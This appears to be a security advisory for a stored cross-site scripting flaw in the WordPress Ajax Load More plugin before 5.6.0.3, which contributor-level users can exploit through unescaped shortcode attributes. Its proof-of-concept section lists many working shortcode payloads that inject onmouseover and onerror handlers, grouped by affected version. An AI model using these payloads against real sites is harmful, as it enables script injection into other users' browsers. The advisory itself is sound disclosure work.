WordPress Infinite Scroll - Ajax Load More < 5.6.0.3 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

PoC

Examples (a lot of attributes are affected!, not just the ones below) v < 5.6.0.3 [ajax_load_more id=‘" onmouseover=“alert(/XSS-id-1/)”’] [ajax_load_more id=‘2" src onerror=alert(/XSSid-2/)//’] [ajax_load_more id=‘a = 1;alert(/XSSid-3/); var b’] [ajax_load_more button_label=‘"onmouseover=alert(/XSS-button_label/)//’] [ajax_load_more button_loading_label=‘"onmouseover=alert(/XSS-button_loading_label/)//’] [ajax_load_more button_done_label=‘"onmouseover=alert(/XSS-button_done_label/)//’] v < 5.6.0.1 [ajax_load_more max_pages=‘"onmouseover=alert(/XSS-max_pages/)//’] v < 5.6.0 [ajax_load_more repeater=‘" onmouseover=“alert(/XSS/)”’] [ajax_load_more theme_repeater=‘" onmouseover=“alert(/XSS/)”’] [ajax_load_more tag=‘" onmouseover=“alert(/XSS/)”’] v < 5.5.5 (original from submitter) [ajax_load_more css_classes=‘" onmouseover=“alert(/XSS/)”’]